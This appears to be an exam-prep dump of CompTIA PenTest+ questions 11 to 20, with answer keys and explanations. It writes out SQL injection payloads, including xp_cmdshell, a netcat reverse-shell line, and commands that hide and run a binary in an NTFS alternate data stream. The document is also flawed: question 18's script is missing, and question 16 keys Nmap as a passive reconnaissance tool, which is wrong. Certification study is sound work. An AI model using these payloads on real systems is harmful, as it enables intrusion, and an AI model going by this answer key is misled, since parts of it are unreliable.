CompTIA CompTIA Certifications PT0-002 Questions & Answers

• Question 11:

  A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

  http://company.com/catalog.asp?productid=22

  The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

  http://company.com/catalog.asp?productid=22;WAITFOR DELAY'00:00:05'

  Which of the following should the penetration tester attempt NEXT?

  A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'

  B. http://company.com/catalog.asp?productid=22' OR 1=1 -

  C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -

  D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

  Correct Answer: C

  This URL will attempt a SQL injection attack using a UNION operator to combine the results of two queries into one table. The attacker can use this technique to retrieve data from other tables in the database that are not normally accessible through the web application.

• Question 12:

  A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

  A. Data flooding

  B. Session riding

  C. Cybersquatting

  D. Side channel

  Correct Answer: D

  https://www.techtarget.com/searchsecurity/definition/side-channel- attack#:~:text=Side%2Dchannel%20attacks%20can%20even,share%20the%20same%20p hysical%20hardware

• Question 13:

  Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

  A. MSA

  B. NDA

  C. SOW

  D. ROE

  Correct Answer: B

• Question 14:

  A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

  A. Gain access to the target host and implant malware specially crafted for this purpose.

  B. Exploit the local DNS server and add/update the zone records with a spoofed A record.

  C. Use the Scapy utility to overwrite name resolution fields in the DNS query response.

  D. Proxy HTTP connections from the target host to that of the spoofed host.

  Correct Answer: D

• Question 15:

  During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

  A. Changing to Wi-Fi equipment that supports strong encryption

  B. Using directional antennae

  C. Using WEP encryption

  D. Disabling Wi-Fi

  Correct Answer: A

  If a penetration tester was able to access the organization's wireless network from outside of the building using Aircrack-ng, then it means that the wireless network was not secured with strong encryption or authentication methods. Aircrackng is a tool that can crack weak wireless encryption schemes such as WEP or WPA-PSK using various techniques such as packet capture, injection, replay, and brute force. To remediate this issue, the client should change to Wi-Fi equipment that supports strong encryption such as WPA2 or WPA3, which are more resistant to cracking attacks. Using directional antennae may reduce the signal range of the wireless network, but it would not prevent an attacker who is within range from cracking the encryption. Using WEP encryption is not a good recommendation, as WEP is known to be insecure and vulnerable to Aircrack-ng attacks. Disabling Wi-Fi may eliminate the risk of wireless attacks, but it would also eliminate the benefits of wireless connectivity for the organization.

• Question 16:

  Which of the following tools would be MOST useful in collecting vendor and other security- relevant information for IoT devices to support passive reconnaissance?

  A. Shodan

  B. Nmap

  C. WebScarab-NG

  D. Nessus

  Correct Answer: B

• Question 17:

  A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  A. Alternate data streams

  B. PowerShell modules

  C. MP4 steganography

  D. PsExec

  Correct Answer: A

  Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals12. For example, the following command can create an ADS named secret.exe in a file named test.txt and run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe and wmic process call create "cmd.exe /c test.txt:secret.exe"

• Question 18:

  A penetration tester writes the following script:

  

  Which of the following is the tester performing?

  A. Searching for service vulnerabilities

  B. Trying to recover a lost bind shell

  C. Building a reverse shell listening on specified ports

  D. Scanning a network for specific open ports

  Correct Answer: D

  -z zero-I/O mode [used for scanning] -v verbose example output of script:

  10.0.0.1: inverse host lookup failed: Unknown host (UNKNOWN) [10.0.0.1] 22 (ssh) open (UNKNOWN) [10.0.0.1] 23 (telnet) : Connection timed out

  https://unix.stackexchange.com/questions/589561/what-is-nc-z-used-for

• Question 19:

  During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

  A. Badge cloning

  B. Watering-hole attack

  C. Impersonation

  D. Spear phishing

  Correct Answer: D

  Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT system administrator, so they can use this information to craft a highly targeted spear phishing attack to try and gain access to the target system.

• Question 20:

  A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

  A. Weak authentication schemes

  B. Credentials stored in strings

  C. Buffer overflows

  D. Non-optimized resource management

  Correct Answer: C

  fuzzing introduces unexpected inputs into a system and watches to see if the system has any negative reactions to the inputs that indicate security, performance, or quality gaps or issues